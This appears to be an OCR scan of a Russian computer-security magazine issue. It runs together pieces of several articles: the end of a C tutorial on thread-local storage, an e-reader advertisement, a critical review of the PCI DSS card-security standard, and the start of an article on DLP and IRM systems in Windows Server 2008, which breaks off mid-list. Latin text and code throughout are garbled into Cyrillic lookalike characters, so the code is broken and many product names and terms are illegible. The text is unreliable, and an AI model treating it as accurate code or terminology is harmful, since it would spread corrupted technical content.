ІзВгсру (В1з_сАаг , " аггау оі сАаг"); 

сАаг 32Мзд[80]; 

мзргіпВГ ( згМзд, "РагатеВег = %<!.", Віз_і ); 
МеззадеВох( ѢГОЪЪ , згМзд, "ТАгеасІРипс", МВ_ОК ); 

геВигп 0; 

} 

іпВ АРІЕЫТКУ МпМаіп( 

НШЗТАРГСЕ АіпзВапсе , 

НІЫЗТАЦСЕ АРгеѵІпзВапсе , 

ЬРЗТК ІрСшЛЬіпе, 
іпВ пСшсІЗАсж) 

{ 

ОШЕО (ІѵАГАгеасІІсі; 

СгеаЕеТАгеай (ШАР, 0, ТАгеасІРипс, 

(ЬРѴОІР)І, 0, &сі™тАгеасіІс1); 

СгеаВеТАгеад (ШАР, 0, ТАгеасІЕипс , 

(РРѴОІБ) 2 , 0 , &(ТмТАгеас1Іс1) ; 

Зіеер ( 10000 ) ; 

// Наслаждаемся результатом 10 секунд 
геВигп 0 ; 

} 

Используя директиву Аесізрес (вАгеас!) , мы объявили две 

ТІ_5-переменные. Код приложения делает в точности все то же 
самое, что и в прошлом примере, с той лишь разницей, что его 
реализация получилась значительно проще за счет отказа от 
ѴѴіпАРІ. 

Однако, тут следует обратить внимание на одну маленькую осо- 
бенность. Переменная Нз_сЬаг — это не указатель на блок 
памяти из кучи, как код с динамической ТІ_8, а целый массив 
с элементами типа СНАП. Мы помним, что размер локальной 
памяти потока ограничен (1088 блоков в ѴѴіпбоѵѵз ХР), и, объя- 
вляя Ц5_сбаг как массив, мы занимаем сразу 25 ячеек ІбгеасІ- 
Іосаі зіогаде. Это очень и очень плохо, так как программа может 
обращаться к 611, которые тоже, в свою очередь, используют ТІ_5. 
В итоге может случиться так, что памяти на всех не хватит, и мы 
получим нерабочее приложение. Помещение в ТІ_3 указателя на 
память, а не самого блока памяти — гораздо более рациональное 
решение. 

Заключение 

Многопоточное программирование — очень тонкая штука, и меха- 
низмы Т1_3 помогают нам быстрее адаптироваться в мире тредов 
и разделяемых ресурсов. Если в коде используются глобальные 
или статические переменные, то при переходе к многопоточности 
Ібгеаб-Іосаі зіогаде просто незаменима, □с 
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АЛЬТЕРНАТИВА Е-МК 

От покупки электронной читалки, учитывая все ее достоинства, может отпугнуть только одно 
- ее цена. Потратить за раз 7-8 тысяч рублей, даже зная, что они с лихвой окупятся, может 
позволить себе не каждый. Но если речь идет о сумме вдвое меньшей? Что тогда? ѴѴехІег реши- 
ла дать ответ и представила модель ѴѴехІег Воок Т7001 , средняя стоимость которой меньше 4-х 
тысяч рублей! 



О Экран ѴѴехІег Воок 
Т7001 выполнен на базе 
7-дюймовой ТРТ-матрицы. 

В отличие от читалок 
на технологии Е-Іпк, у 
которых нет подсветки, 
новым ѴѴехІег’ом можно 
пользоваться в темноте: 
читать книги, играть в 
простые игры и смотреть 
видео. Последнее вызывало 
у нас вопросы, но оказалось, 
что девайс отлично тянет 
даже хорошие ОѴО-РІР’ы. 



О Читалка снабжена 
собственной памятью 
емкостью 4 Гбайт, гнездом 
для карт МісгоЭй (до 1 6 
Гбайт) и встроенным 
динамиком. Для приватного 
прослушивания аудио 
книг, музыки и РМ-радио в 
комплекте имеются удобные 
наушники. 




О Благодаря низкому 
энергопотреблению, в 
режиме просмотра видео 
заряда аккумулятора хватает 
более чем на 5 ч, а при 
прослушивании аудио- 
файлов — до 7 ч. Полная 
зарядка занимает 6 ч. 



О Устройство поддерживает 
все популярные форматы 
электронных книг. Оно 
даже позволяет читать 
журналы в формате РОГ. В 
этом случае очень удобно 
использовать функцию 
лупы для передвижения по 
тексту. А еще удобнее читать 
мелкие журнальные тексты в 
горизонтальном положении 
читалки. 



© ТЕХНИЧЕСКИЕ ПОДРОБНОСТИ 

Текстовые форматы: ТХТ, РОГ, РВ2, РТР, ЕРОВ, НТМІ_ 
Форматы видео: АѴІ, Хѵіб, Оіѵх 4/5, РМ, РМѴВ, РІ_Ѵ, МКѴ 
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Пластиковая 

безопасность 

Взгляд на аудит сквозь призму стандарта 
РСІ 088 



Проведение «мероприятий по оценке соответствия требованиям стандарта безопасности 
данных индустрии платежных карт (РСІ 055)» стало одной из самых востребованных услуг, 
предоставляемых консалтинговыми организациями. Насколько эта оценка отражает реальное 
положение дел в «пластиковой» инфраструктуре? Сегодня на нашем операционном столе 
стандарт, требования которого некоторые считают «панацеей» от утечки платежных данных. 



Стремительно растет количество операций с использованием пласти- 
ковых карт: онлайн-платежи, безналичный расчет в торгово-сервисных 
предприятиях, манипуляции с банковским счетом в системах онлайн- 
банкинга и прочие платежные приложения от поставщиков услуг. 
Соответственно, расширяется инфраструктура, в которой циркулируют 
информация о держателях карт и критичные аутентификационные 
данные. В случае попадания этой информации или ее части в руки к 
злоумышленникам финансовые потери несут как банки-эмитенты, так и 
конечные пользователи. 

С ростом масштабов системы, обрабатывающей элементы данных о 
держателях платежных карт, расширяются и горизонты мошенничества. 
В контексте рассматриваемой проблемы наиболее распространенными 
атаками, направленными на пользователя, по-прежнему остаются кра- 
жа данных с использованием вредоносного программного обеспечения 
и хищение информации с использованием поддельных веб-ресурсов 
компании-вендора (фишинг) . Атаки, направленные на самого вендора, 
в большинстве случаев осуществляются сотрудниками пострадавшей 
компании (инсайдинг) . И если в первом случае со злоумышленниками 
можно бороться на уровне информирования пользователя и установки 
соответствующего клиентского программного обеспечения, то во вто- 
ром случае нужен соответствующий организационный и технический 
подход к защите процессов системы, в которой хранятся, обрабатывают- 
ся и передаются элементы данных пластиковых карт. 

Совет по стандартам безопасности индустрии платежных карт (Раушеш 
СапЗ ІпбизЦу Зесигку Зшпйагск Соипсіі, РСІ 85С) , основанный ведущими 
международными платежными системами (ѴІ8а, МазШгСагсІ, Ашегісап 
Ехргезз, Оізсоѵег, ьІСВ) , разработал документ, в котором содержится рег- 
ламент обеспечения безопасности данных о держателях карт — стандарт 
безопасности данных инд устрии платежных карт (Раушеш Сагб Іпсіизіту 
Баш Зесигку Зіапсіагсі, РСІ Э55) . 

Этот стандарт представляет собой «библию» платежной индустрии. На 
соответствие его требованиям проверяются практически все партнеры 
ведущих международных систем. Его требования стали источником ме- 
тодологий проведения аудита безопасности, который так активно пред- 
лагается консалтинговыми компаниями, и который, как подразумевают 
эти компании и сам стандарт, снизит до нулевой отметки уровень рисков 
в среде «заказчика». Именно требования этого стандартаявляются клю- 
чом к получению престижного «сертификата соответствия РСІ ЭЗЗ», а, 
значит, головной болью системного администратора сертифицируемой 
организации. 

Рассматривать стандарт мы будем неформально и с разных точек зрения : 
с позиции системного администратора, поле деятельности которого 
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подвергается аудиту, и с позиции аудитора. А также местами будем 
«подглядывать» и из-за той стороны баррикад, со стороны тех, ради кого 
обычно весь этот цирк затевается — злоумышленники. 

Г руппа поддержки РСІ 055 

Впервые столкнувшись с этой шестибуквенной аббревиатурой, 
руководитель компании, который заинтересован в получении сер- 
тификата, администратор сети или сотрудник внутренней службы 
безопасности, в интересах которого обеспечение соответствия 
защиты информационных процессов требованиям стандарта, рискует 
потратить значительную часть драгоценного времени на разбор доку- 
ментов, поддерживающих этот стандарт. С целью облегчить им жизнь, 
определим состав официальных документов РСІ Э55 и их взаимосвязь 
между собой, чтобы определиться, с чего начинать изучение в первую 
очередь, а что можно оставить на закуску. 

Начнем с определения состава поддерживающей документации: 

1. Глоссарий (Сіоззагу); 

2 . Стандарт безопасности данных индустрии платежных карт (Раушеш 
Сагб Іпсіизиу ЭаШ Зесигку ЗгапсІагсІ) ; 

3. Требования и процедуры оценки информационной безопасности (РСІ 
Э55 Зесигку Аисік Ргосейигез) ; 

4 . Процедуры сканирования безопасности (РСШ55 Зесигку 5саппіп§ 
Ргосебигез); 

5 . Требования, предоставляемые (^ЗА-аудиторам (РСІ ЭЗЗ Ѵаіісіайоп 
Кециігетепіз Іог (^иаШес! Зесигку Аззеззогз) ; 

6 . Требования, предъявляемые к вендорам услуг сканирования (РСІ ЭЗЗ 
ѴаШайоп І^иігетешз іогАрргоѵесІ 3 саппіп§ Ѵепсіогз) ; 

7 . Ориентирование в РСІ Э55 (Ыаѵі§агіп§РСІ Э55 ЭоситеШ); 

8. Приоритезированный подход кдостижению соответствия РСІ Б55 
(Ргіогкігесі Арргоасй Іог РСІ ЭЗЗ) ; 

9 . Листы самооценки (РСІ Э55 ЗеІГАззеззтеШ Оиезйоппаке) ; 

10 . Дополнительная документация (уточнения некоторых требований 
стандарта и дополнительная информация для стороны, предоставляю- 
щей услуги). 

Довольно «солидный» список, который, с одной стороны, внушает 
доверие к «всесторонности» проводимого аудита по стандарту и 
объективности полученных результатов, а с другой — сильно развязы- 
вает руки аудиторам, практически со стопроцентной вероятностью 
позволяя им «сливать» заказчика по огромному списку критериев. А 
если еще проверяемая сторона не удосужилась ознакомиться с требо- 
ваниями РСІ ЭЗЗ, то не избежать и предварительного аудита — услуги, 
кстати, весьма полезной и в большинстве случаев просто необходи- 
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мой, но требующей финансовых вложений с проверяе- 
мой стороны, что обеспечивает солидный кусок хлеба с 
маслом стороне проверяющей. 

Однако не вся «кипа» вышеперечисленных документов 
требует пристального изучения. В этом списке проверяе- 
мой стороне в первую очередь стоит изучить позиции 7-9 
(смотри список выше) — приложения, которые ориентиро- 
ваны на заказчика услуги с целью его ознакомления и, так 
сказать, безболезненной (с точки зрения инфраструктуры и 
бизнес-процессов) адаптации к требованиям стандарта: 

• «Ориентирование в РСІ 055»(пункт 7) представляет собой 
обзор 12 требований РСІ Э55 (пункт 1) с целью улучшения 
их понимания сотрудниками организации, которая подле- 
жит сертификации; 

• «Приоритезированный подход» (пункт 8) подскажет от- 
правную точку и направление, в котором нужно двигаться 
проверяемой организации, чтобы вывести свою информа- 
ционную безопасность на необходимый уровень, обеспечив 
защиту от актуальных угроз, и, как следствие, подготовить 
свою инфраструктуру к аудиту. 

• Листы самооценки и инструкция по их заполнению позво- 
ляют организации провести самоконтроль на соответствие 
стандарту РСІ 055 — полезное мероприятие, причем не 
только в момент, когда вот-вот аудитор начнет трясти все 

и вся в поисках несоответствий, но и прекрасно подходит в 
качестве профилактических мер, проводимых внутренней 
службой безопасности. 

Оставшаяся часть документационной базы (пункты 1-6 и 
дополнительная документация) требует пристального вни- 
мания аудиторов, а также консалтинговых организаций, 
решивших выйти на этот рынок, получив статус (^5А. При 
составлении методики проведения проверок на соответс- 
твие РСІ Б55 придется «возиться» именно с этой частью 
поддерживающихдокументов. 

Разработчик стандарта почему-то не уделяет внимания 
процедуре структуризации своей документационной 
базы, доверяя ее своим клиентам. Возможно, подразуме- 
вается тот факт, что консультант так или иначе должен 
разрабатывать свою методологическую базу проведения 
аудита, собирая информацию, как отдельные кусочки 
паззла, рисовать на получившемся шаблоне свою картину, 
а заказчик услуги, в свою очередь, должен с головой уто- 



нуть в поддерживающей документации и после того, как 
почувствует себя комфортно в ее глубинах, привести свою 
инфраструктуру в над лежащий для прохождения процеду- 
ры проверки вид. Скорее всего, это философский вопрос, 
и чтобы не задерживаться в поисках ответа предлагаю 
взглянуть на соответствующий рисунок, где отражена 
подчиненность официальных документов стандарта. 

Поле битвы — сегмент 

Если оптимистично посмотреть на область применения 
РСІ Б55, то по своей сути требования распространяются 
на систему, в которой происходит манипуляция с номе- 
ром карты (РАМ) . Однако понятие «система» на практике 
довольно растяжимо, и номера карт могут обрабатываться 
во множестве компонентов, которые и определяют систему. 
Кстати говоря, помимо данных о держателях карт, куда 
относится РАМ и другая информация, есть еще и критичные 
аутентификационные данные, хранение которых недопус- 
тимо даже в зашифрованном виде. 

Если взглянуть на таблицу, которая иллюстрирует элементы 
данных пластиковых карт и соответствующие им меры 
защиты, то можно заметить, что такие элементы, как СѴѴ2 
(Сагй Ѵегійсагіоп Ѵаіие 2 — код проверки подлинности 
карты платежной системы Ѵіза) и СѴС2 (аналогичный код 
платежной системы МазШгСагй) относятся к критичным 
аутентификационным данным, а значит, не под лежат хране- 
нию. Тем не менее, в пользовательской практике встреча- 
ются случаи, когда торгово-сервисное предприятие с целью 
упрощения жизни своим клиентам не требует повторного 
ввода этого кода на своем веб-ресурсе. Таким организациям 
приходится выбирать между сертификатом РСІ Б55 (и, 
как следствие, безопасностью своих бизнес-процессов) и 
излишней псевдозаботой о своих пользователях, ведь СѴС2 
и СѴѴ2 являются одним из ключевых звеньев при соверше- 
нии финансовых опііпе-операций. 

Оптимизация структуры целевой системы с последующим 
выделением среды, в которой происходит манипуляция с 
данными о держателях карт, позволяет сузить область вли- 
яния РСІ Э55, сфокусировать внимание аудитора на более 
конкретном объекте и, как следствие, сократить затраты 
на проведение оценки соответствия. Только вот процесс 
сегментации требует понимания и, возможно, реструкту- 
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ризации бизнес-процессов рассматриваемой организации, что может 
оказаться куда дороже, чем неоптимизированный аудит. В таком случае 
под область аудита попадает вся сеть. Тут уже каждая организация долж- 
на сама решить, стоит ли ей пересматривать свою текущую практику 
ведения бизнеса или проще подвергнуться проверке в режиме «как есть». 
Если каким-либо образом беспроводные сети используются в качестве 
среды передачи данных о держателях карт, то этот факт является следс- 
твием некорректной сегментации или ее отсутствием. В данном случае в 
силу вступают требования РСІ Э55 для беспроводных сетей, что нехоро- 
шо ни для проверяемой стороны (в силу «дотошности» требований) ни 
для стороны проверяющей (специалисты по безопасности беспровод- 
ных сетей «на дороге валяются») . 

Еще одним «паразитом» в исследуемом сегменте выступают сторонние 
организации, которые предоставляют услуги обработки, хранения или 
передачи данных о держателях карт исследуемой организации. Каждой 
из третьих сторон необходимо представить аудитору сертификат соот- 
ветствия РСІ Э55 или, в противном случае, пройти процед уру оценки 
соответствия. 

Делаем выводы: 

1. Грамотная сегментация способна сократить временные и, в некоторых 
случаях, финансовые расходы на проведение оценки соответствия; 

2 . Наличие в системе беспроводных сетей как средств обработки данных 
о держателях — результат некорректной процедуры сегментации или же 
ее отсутствия; 

3. Привлечение третьих сторон в бизнес-процесс влечет к дополнитель- 
ным временным затратам на проверку этих сторон аудитором, который 
должен отчетливо понимать роль исследуемой компании и ее поставщи- 
ков услуг (третьих сторон) в платежной индустрии. 

А что насчет второй версии? 

Теперь проведем краткий обзор основных требований стан- 
дарта РСІ 055 ѵ2.0 (обновление от 28 октября 2010 года). 12 
требований объединены в группы по типам процедур аудита 
безопасности. 



Первая группа — «Построение и обслуживание защищенной сети» (тре- 
бования 1 и 2) . С первого требования становится понятно, насколько 
важен процесс сегментации целевой инфраструктуры и на основе каких 
средств, собственно, строится этот процесс — межсетевой экран. Аксио- 
ма: межсетевой экран — основа обеспечения безопасности. Грамотное 
проектирование циркулируемого трафика приводит в порядок всю 
инфраструктуру в целом. Тем не менее, в последней версии стандарта все 
же делается некоторое смягчение формулировки первого требования 
и подразумевается факт фильтрации и блокировки трафика не только 
средствами межсетевого экрана. 

Помимо осуществления блокировки и фильтрации сетевого трафика на 
основных компонентах рассматриваемой системы (что в контексте под- 
держивающих документов означает сервера в исследуемой сети) , первое 
требование содержит пункт 1.4, который подразумевает персональные 
файерволы на рабочих станциях сотрудников компании с должной 
конфигурацией (пользователь не может изменять параметры работы 
файервола) — это, пожалуй, самая «трудноконтролируемая» процедура 
со стороны администратора организации. Тут есть два пути решения: 
либо поставить на рабочие станции всех сотрудников персональные 
межсетевые экраны и сконфигурировать их должным образом, либо, 
прошу прощения за сарказм, сократить количество рабочих станций. 
Второе требование напоминает администраторам сети об обязатель- 
ном изменении системных параметров, заданных производителем по 
умолчанию. Несмотря на обманчивую банальность пунктов, второе тре- 
бование содержит подпункт 2.2.4, который требует удаление из системы 
«всей ненужной функциональности: сценарии, драйверы, дополни- 
тельные возможности, подсистемы, системы, ненужные для работы 
веб-серверы». Таким образом, аудитору предоставляется редчайшая 
возможность ведения произвола, ведь «ненужный» функционал может 
оказаться «некстати» в нужных местах. 

Группа требований «Защита данных о держателях карт» (требования 
3 и 4) рассматривает критичные методы защиты данных (шифрова- 
ние, политики ключей безопасности и т.п.) и область их применения, 
в то время как остальные методы защиты информации, описанные 
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Элемент данных 


Хранение 

разрешено 


Требуется 

защита 


Требования 3.4 
РСІ 05$ 


Данные о 
держателях карт 


Номер платежной карты (РАІЧ) 


\/ 


\/ 


\/ 


Имя держателя карты (СагсІИоІсіег Мате) 


V 


\/ 


X 


Сервисный код (Зегѵісе Согіе) 


\/ 


\/ 


X 


Дата истечения срока действия 
(Ехрігаііоп Оа+е) 


\/ 


\/ 


X 


Критичные аутен- 
тификационные 
данные 


Вся магнитная полоса карты 


X 


не определено 


не определено 


САѴ2/СѴС2/СѴѴ2/СЮ 


X 


не определено 


не определено 


РІЫ / РІЫ ВІок 


X 


не определено 


не определено 



Таблица, иллюстрирующая элементы данных и соответствующие им меры 



в других требованиях, позиционируются в качестве 
средств снижения рисков компрометации. Данная сово- 
купность требований описывает политику и жизненный 
цикл ключей безопасности. В связи с тем, что хранение 
данных о владельцах пластиковых карт в зашифрован- 
ном виде позволяет исключить факт их незаконного 
использования злоумышленником (если тот каким-либо 
образом преодолел остальные рубежи защиты), пункты 
этой группы носят довольно жесткую формулировку, что 
позволяет однозначно ее интерпретировать объектом 
и субъектом аудита. Кстати, полезной техникой при 
хранении данных о держателях пластиковых карт, 
относящихся к персональным данным (информация, 
относящаяся к определенному физическому лицу), 
является их «расперсоналивание» — процедура удаления 
или независимого хранения фрагментов этих данных, 
которые сами по себе не могут однозначно идентифици- 
ровать своего владельца. 

Следующая группа, объединяющая в себе требования 5 и 6, 
называется «Управление уязвимостями». Уязвимости есть, 
и ими надо грамотно управлять, а именно: своевременно 
устанавливать актуальные обновления, в том числе и на 
антивирусное программное обеспечение, разрабатывать 
и использовать безопасные приложения, в том числе и 
веб-ориентированные. Без пентеста или, на крайний 
случай, сканирования не разберешься. . . Но о пентестах 
речь вообще отдельная, поэтому вернемся-ка мы к ним мы в 
требовании 11. 

Следующие три требования (7, 8 и 9) объединены в группу 
«Внедрение строгих мер контроля доступа» и носят орга- 
низационно-технический характер обеспечения защиты 
информации с использованием как организационных мер 
обеспечения безопасности, так и механизмов физического 
доступа и мониторинга. 

Пожалуй, самая вкусная группа требований, с точки зрения 
консалтинговых компаний в области информационной 
безопасности — «Регулярные мониторинг и тестирование 
сети». Не каждое торгово-сервисное предприятие способно 
«содержать» внутреннюю службу информационной безо- 
пасности и своими силами регулярно выполнять профилак- 
тические тесты на проникновение и мониторинг процессов 
обеспечения безопасности. Потребность в осуществлении 
этих систематических процедур рождает на рынке инфор- 



мационной безопасности спектр таких услуг как «тесты 
на проникновение» и «сканирование инфраструктуры на 
уязвимости». Правда, сканирование требуется от вендо- 
ра, имеющего статус А5Ѵ, что так или иначе увеличивает 
стоимость данной услуги. Аудитор, в свою очередь, в 
процессе оценки соответствия требованиям стандарта 
РСІ П55 должен ознакомиться с результатами последне- 
го профилактического пентеста и А5Ѵ-сканирования 
(пункты 11.2 и 11.3) иубедиться, что все выявленные 
уязвимости устранены. Подводный камень скрывается 
в том факте, что результаты эти могут быть получены в 
результате услуг пентеста и сканирования, предостав- 
ленных третьей организацией и, как следствие, вывод 
аудитора строится на доверии к данным, полученным в 
ходе оказания этой услуги. 

Последнее в списке требование под номером 12 формули- 
руется следующим образом: «Разработать и поддерживать 
политику информационной безопасности», которое по 
своим масштабам реализации вряд ли уступает разработ- 
ке бизнес-плана компании. Пункт 12.1.1 требует создания 
такой политики, которая учитывает все требования РСІ 
БЗЗ. В этом случае тем торгово-сервисным предприяти- 
ям и сервис-провайдерам, которые намерены получить 
заветный сертификат, стоит начать именно с разработ- 
ки своей политики безопасности, а тем, у кого она уже 
имеется, настоятельно рекомендуется ее пересмотреть в 
соответствии со стандартом. Зачастую именно этот факт 
заставляет задуматься руководителей о рациональности 
внесения изменений в текущие бизнес-процессы и пройти 
сертификацию. 

Это слишком близко. . . 

И вот аудитор на пороге офиса заказчика. Если руко- 
водитель компании относится к процессу аудита, как к 
экзамену на первом курсе высшего учебного заведения, 
то и процедура оценки соответствия будет представлять 
из себя сплошную «тягомотину» ради галочки в отчете. 
На мой взгляд, Аудитора следует расценивать скорее 
как консультанта, который в первую очередь оказывает 
руководителю целевой компании поддержку в органи- 
зации процесса защиты информации, утечка которой 
может стоить гораздо больше, чем услуга сертификации 
по стандарту РСІ ЭЗЗ.зс 
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Недавно обновлен- 
ная версия стандарта 
(РСІ 055 ѵ2. 0 от 28 
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практически не пре- 
терпела радикальных 
изменений. Обнов- 
ления требований 
носят разъяснитель- 
ный и уточнительный 
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Профилактика 
утечек данных: 

БЬР, ШМ И СТАНДАРТНЫЕ СРЕДСТВА \Ѵ$2оо8 

Как ограничить возможность пользователей 
использовать данные, к которым у них есть 
доступ? 

В этой статье будет рассказано о двух подходах к решению поставленной задачи — мы 
расскажем о системах РІ.Р и ІРМ, их возможностях и недостатках. А заодно рассмотрим одно 
из решений в области ІРМ с элементами РІ.Р- то, которое идет в составе ОС ѴѴіпбоѵѵз Зегѵег 2008. 



Описание проблемы 

Стандартное разграничение доступа или шифрование данных 
на уровне файловой системы позволяет либо разрешить доступ к 
данным, либо целиком его запретить. Но существуют ситуации, 
когда такого грубого разграничения недостаточно. Чаще всего 
приходится сталкиваться с «гибкими» ограничениями со стороны 
правообладателей, когда конечным пользователям навязывают 
способ употребления купленного контента. Технологии, позво- 
ляющие ограничить или отследить создание копий, задать срок 
использования файла, называют Б КМ (Ні§ітІКі§ЬщМапа§етегц, 
иногда расшифровывают как Оі^ітІКезтсйопзМапа^етепі:) . При 
использовании ограничений на операции с файлами в корпора- 
тивной среде (для защиты персональных данных, коммерческой 
тайны, финансовых отчетов) чаще используют другие близкие 
термины: 

с ЕРШ — Епіегргізе Оіді+аІ Рід№$ МападетепІ 
ЕВМ — ЕпТегргізе КідНіз Мападетеп! 

• ІРМ — Іпіогтаііоп РідЬ+з Мападетеп* 

• РМ5 — ВідЬізМападетепіЗегѵісез, название отМісгозо^для ІРМ 

Все перечисленные выше технологии используют шифрование для 
защиты содержимого файла и применяют ограничения на возмож- 
ные действия с файлами на уровне приложений. 

Другая проблема — это утечка конфиденциальных данных. Причем, 
если раньше утечка могла нанести вред репутации или выручке 
компании, то сейчас все ближе тот день, когда у нас начнет действо- 
вать федеральный закон «О персональных данных», и утечка данных 
сможет привести к административной, гражданской и уголовной 
ответственности. Особую остроту этой проблеме придает то, что 
утечка может быть непреднамеренной, например: 

• При отправке письма пользователь прикрепил не тот документ, 
или при выборе е-таіі из списка получателей ошибся и отправил 
конфиденциальные данные не тому; 

• Сотрудник, потратив целый день на просмотр новостей и блогов, 
решил вовремя довести проект до конца и для этого списал докумен- 
ты на флешку, чтобы поработать дома, но флешку потерял. 

Для решения проблемы утечек применяются ОБР (Эаі:аБеака§е 
(Ьо55)Ргеѵепйоп) приложения, которые отслеживают и предотвра- 
щают неавторизованную передачу данных. 
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РІ.Р и ІРМ — конкуренты 
или союзники? 

Сейчас на рынке существуют две технологии, которые решают сход- 
ные, но не одинаковые задачи двумя различными способами — ББР 
и ІКМ. Практически все крупные фирмы (ІВМ, Сізсо, К8А (под- 
разделение ЕМС), Огасіе, МісгозоК, СЬескРоігц, Зутаглес) имеют 
решение хотя бы в одной из этих областей. С каждым годом ущерб 
от утечек и нецелевого использования данных растет, как растут и 
прибыли компаний. В реальности же ни одна из технологий не ре- 
шает свою задачу полностью, поэтому все больше производителей 
понимают необходимость их объединения, создают комплексные 
решения или предлагают интеграцию. 

ББР-приложение контролирует данные на разных этапах: 

• йаІа-аі-Резі. Обнаруживает и классифицирует данные, находя- 
щиеся на серверах, дисках, ленточных накопителях. Проверяет, что 
данные не исчезли, и генерирует соответствующие отчеты. 

Оаіа-Іп-Моііоп. Отслеживает (и, возможно, блокирует) данные, 
передаваемые по сети. 

• Раіа-іп-ІІзе. Контролирует перемещение данных на конечных сис- 
темах, например, отправку на печать или копирование на внешние 
носители. 

Для полноценного ЭБР-решения необходима реализация возмож- 
ности блокировки передачи данных — часть решений способна 
только генерировать оповещения. Блокировка, с одной стороны, 
позволяет реально предотвратить утечку, но с другой может сильно 
мешать нормальному течению бизнес-процессов. Еще важно нали- 
чие единой консоли для просмотра всех отчетов, хранения истории 
и возможности ее анализа. Для ББР-решения очень важна классифи- 
кация данных и отделение общедоступных данных от тех, которые 
требуют защиты. Для корректной классификации необходимо 
очень много ручной работы, но часть классификации можно авто- 
матизировать с помощью ключевых слов, шаблонов (например, 
по формату паспортных данных или номеру кредитной карты), зада- 
ния местоположения файлов, которые автоматически попадают в 
категорию «конфиденциально», или автоматическое добавление в 
эту категорию файлов, созданных определенными пользователями. 
Так как существует масса разнообразной информации, переда- 
ваемой по различным протоколам во всевозможных форматах 



ХАКЕР 01 (144) 201 1 








Получатель информации 



I 

I 




и кодировках, то основные ограничения ЭЬР-систем связаны с 
невозможностью отслеживания всех каналов утечки и обработки 
всех форматов данных. Другое ограничение — это необходимость 
ручной классификации данных и сложность локализации, кото- 
рая учитывала бы не только ключевые слова, но и местные формы 
представления данных, чувствительных к утечке. Кроме того, невоз- 
можно отследить данные на бумажных носителях, которые были ле- 
гально распечатаны. Возникают серьезные проблемы при анализе 
видео-конференций, голосового общения, файлов, хранящихся в 
облаке, и архивов, даже с самыми короткими паролями. 

Внедрение ПЬР-решения может растянуться не на один месяц. Са- 
мое сложное при внедрении — это определение данных, которые не- 
обходимо защищать, и всех возможных каналов утечки. Кроме того, 
необходимо ограничивать использование программ/протоколов/ 
типов данных, которые не обрабатываются ЭЬР-решением, на уров- 
не операционных систем. А еще очень важно сохранить возмож- 
ность нормальной работы с не конфиденциальными документами. 
Надо понимать, что есть решения, которые отслеживают отправку 
на печать, есть решения, которые затрудняют получение скрин- 
шотов, но нет программных или аппаратных решений, которые 
помешают пользователю сфотографировать экран или запомнить 
данные и пересказать их. Так что все ПЬР-решения направлены в 
большей степени на защиту от непреднамеренной утечки. Если 
же нам требуется передать конфиденциальные данные за пределы 
организации, например, партнерам, то как отследить, что они не 
«утекут» от партнера? Тут и возникает необходимость в ІКМ-реше- 
ниях. 

ІКМ позволяет «удаленно» контролировать использование докумен- 
тов. За счет шифрования файлов удается предотвратить неавтори- 
зованный доступ, а с помощью клиентских приложений удается ог- 
раничить возможные действия над документами. В отличие от ЭКМ, 
который принудительно навязывают пользователям, ІКМ полезен 
организации, так как позволяет сохранить конфиденциальные дан- 
ные в секрете. Использование ІКМ ограничивается поддержкой на 
уровне пользовательских приложений. Совместное использование 
ИЬР и ІКМ очень и очень оправдано. ИЬР — хорошее решение для 
наблюдения за системами и сетью, опознавания конфиденциаль- 
ного содержимого с последующим оповещением или блокировкой 



передачи данных. Но ПЬР — это «внутреннее» решение, которое не 
работает за пределами организации. Вы не можете применить свои 
политики к партнерам или к облачным хранилищам, но спокойно 
можете использовать в этих ситуациях ІКМ. 

Что позволяет сделать Ай Ш5? 

Служба управления правами АсйѵеПігесШгу (АО КМ5; ее роль появилась 
в ѴѴіпсІоѵѵз Зегѵег 2008, ранее Кі^Ьіз Мапа^етеш Зегѵісез были доступны 
как отдельный компонент) — одно из самых доступных ІКМ-решений, 
так как идет в составе довольно популярной в компаниях ОС и замеча- 
тельно интегрируется с остальными компонентами. То есть для внед- 
рения АЭКМЗ не требуются дополнительные финансовые вливания и 
работа с напильником для интеграции в существующую инфраструк- 
туру. Например, при работе с ЗЬаге Роіш нет необходимости вручную 
назначать разрешения на каждый документ, так как разрешения 
применяются на уровне библиотеки. Кроме того, ѴѴіпсІоѵѵз Зегѵег 
2008 К2 включает в себя Рііе Сіаззійсайоп ІпйгазітисШге, что позволяет 
автоматизировать классификацию файлов на основании местополо- 
жения, владельца или создателя файла, содержимого, размера и других 
параметров. АО КМ5 позволяет задавать следующие разрешения на ра- 
боту с файлами: Риіі СоШгоІ, Ѵіеѵѵ, ЕсНц Заѵе, ЕхйгасЦ Ехрогц Ргіт, АПоѵѵ 
Масгоз, Рогѵѵагсі, Керіу, Керіу А11, Ѵіеѵѵ Кі^іпз. АО КМ5 по умолчанию 
может работать со следующими типами документов: 

• Документы ѴѴогй, Ехсеі, РоѵѵегРоіш и ІпГоРаШ, начиная с 2003 
версии офиса. В версиях офиса, кроме МісгозоК ОШсе Шгітаіе 2007, 
ОШсеЕшегргізе 2007, ОШсе РгоГеззіопаІ Ріиз 2007 и ОШсе 2003 
РгоГеззіоп, можно только читать, но нельзя создавать документы, 
защищенные с помощью АЭ КМ5. 

• Файлы МісгозойХМЬ Рарег ЗресШсагіоп (ХР5). 

Кроме этого партнеры М5 регулярно добавляют поддержку новых 
типов документов: 

• Создание и работа с защищенными рсК-файлами с помощью Рохй 
РБР Зесигііу Зіше, Сі^аТгизі: Епіегргізе, решений от компаний Ілциісі 
МасЫпез и Зесиге Ізіапсіз. Продукты Рохй ориентированы только на 
работу с рсй-файлами и неплохо интегрируются с Місгозой ОШсе 
ЗЬаге Роіш Зегѵег. Преимущество же решения Сі^аТгизі: в том, что 
оно блокирует несколько сотен приложений по захвату экрана и 
предоставлению файлов в общий доступ. 
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Рисунок 4. Просмотр документов через ѴѴаРсНОох 



Рисунок 3. Добавление роли АР Ш$ 
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• Вышеперечисленные компании предлагаю решения и для защиты 
САЭ-файлов и некоторых других форматов. 

• Для поддержки любых типов фалов можно использовать АЭКМ5 
ЗоіДѵѵаге Оеѵеіортегл Кп (5ЭК), который позволяет программно 
шифровать и расшифровывать документы, ассоциировать права с 
содержимым файлов и взаимодействовать со службами АЭКМ5. 

В процессе работы с АБКМЗ генерируется большое количество 
сертификатов и лицензий, которые, по сути, тоже являются серти- 
фикатами. На рисунке 1 перечислены основные сертификаты и их 
содержимое. На рисунке 2 изображен процесс создания и работы с 
защищенным документом, который состоит из следующих шагов: 



Рисунок 1. Сертификаты и лицензии, используемые 
АОКМ5 



1. Автор единожды, при первой попытке создать защищенный доку- 
мент, получает ВАС и СЬС от кластера АО КМ5. 

2 . С помощью приложения, поддерживающего работу с АО КМ5, 
